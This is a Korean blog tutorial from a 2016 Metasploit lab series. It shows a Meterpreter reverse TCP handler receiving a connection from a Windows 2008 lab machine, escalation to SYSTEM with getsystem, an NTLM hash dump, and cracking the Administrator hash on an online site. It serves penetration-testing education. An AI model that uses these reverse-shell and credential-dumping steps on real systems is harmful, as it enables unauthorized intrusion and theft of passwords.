정보보안(구버전)/Metasploit 2016. 6. 7. 12:24
Metasploit - 12. 취약점 발견 및 공격 (Password Hash Dump)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
[실습 시스템] Kali Linux, Firewall, Window2008
- Reverse TCP를 이용하여 Window2008 제어권을 획득한 이후, Window2008 패스워드 해킹을 테스트한다.
[실습 단계]
스캔 -> 공격 타겟 선정 -> 백도어 구성 -> 공격 코드 파일 생성 -> 공격 타겟에 공격 코드 파일 유입 실시
-> 백도어 실행 -> 공격 코드 파일 실행 -> 제어권 획득 -> 패스워드 Hash Dump 실시 -> 크랙 사이트 이용
Ex1) Window2008 로그인 패스워드 변경
- 실습을 하기 위해서 로그인 패스워드를 간단하게 변경하도록 한다. (패스워드 : 0000)
@ Window2008
① 시작 -> 관리도구 -> 로컬 보안 정책
② 보안 설정 -> 계정 정책 -> 암호 정책
③ "암호는 복잡성을 만족해야 함" -> 마우스 우클릭 -> 속성(R) -> "사용 안 함(S)' 체크 -> 확인
④ 시작 -> 관리도구 -> 컴퓨터 관리 -> 로컬 사용자 및 그룹 -> 사용자
⑤ 'Administrator' 선택 -> 마우스 우클릭 -> 암호 설정 -> 계속 -> 패스워드 '0000' 설정 -> 확인
Ex2) 백도어 'reverse_resource.rc' 실행
@ Kali Linux
root@kali:~# cd /root/bin
root@kali:~/bin# msfconsole -r reverse_resource.rc
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.5-2016010401 ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing reverse_resource.rc for ERB directives.
resource (reverse_resource.rc)> use exploit/multi/handler
resource (reverse_resource.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (reverse_resource.rc)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (reverse_resource.rc)> set ExitSession false
ExitSession => false
resource (reverse_resource.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] Starting the payload handler...
msf exploit(handler) >
Ex3) Window2008 'reverse.exe' 공격 코드(악성 코드) 실행
@ Window2008
Ex4) 백도어 'reverse_resource.rc' 상태 확인
- Window2008이 Kali Linux에 연결되었는지 확인한다.
@ Kali Linux
msf exploit(handler) >
[*] Sending stage (1188911 bytes) to 192.168.20.201
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.201:1033) at 2016-06-07 11:20:43 +0900
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/win64 WIN2008\Administrator @ WIN2008 192.168.20.50:4444 -> 192.168.20.201:1033 (192.168.20.201)
- Window2008 제어권 획득 실시
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN2008
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/win64
meterpreter > getuid
Server username: WIN2008\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY f43109aa8336014a3cc6fc4322a81e05...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ea7c23f2efca850e3fb547ca12567c33:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.201 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) >
msf exploit(handler) > exit
root@kali:~/bin#
Ex5) 패스워드 크랙 사이트를 이용하여 패스워드 크랙 실시
- 패스워드 크랙 사이트 : http://hashkiller.co.uk
@ 로컬 PC
Decrypter/Cracket -> NTLM Decrypter
Window2008 'Administrator' Hash Dump 입력 -> Submit 클릭
Administrator 로그인 패스워드 '0000' 확인
- Window2008 원래 패스워드로 변경 실시
[참고] 윈도우 SAM 파일에 있는 패스워드 Hash 크랙 툴
- 존더리퍼(John The Ripper), PWDump, Rainbow Crack
- 'hashkiller.co.uk' 사이트는 복잡한 패스워드에 대해서 크랙 시간이 길거나 불가능하다.
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
Metasploit - 제1장 메타스플로잇 (metaspliot)
'정보보안(구버전) > Metasploit' 카테고리의 다른 글
Metasploit - 14. Setoolkit (Fake Web 사이트 구성) (0) | 2016.06.07 |
---|---|
Metasploit - 13. Metasploit Window 버전 설치 및 실행 (2) | 2016.06.07 |
Metasploit - 11. 취약점 발견 및 공격 (키보드 스니핑 & 스크린샷) (0) | 2016.06.07 |
Metasploit - 10. 취약점 발견 및 공격 (Window2008 로그 삭제) (0) | 2016.06.03 |
Metasploit - 09. 취약점 발견 및 공격 (Reverse TCP 공격) (1) | 2016.06.03 |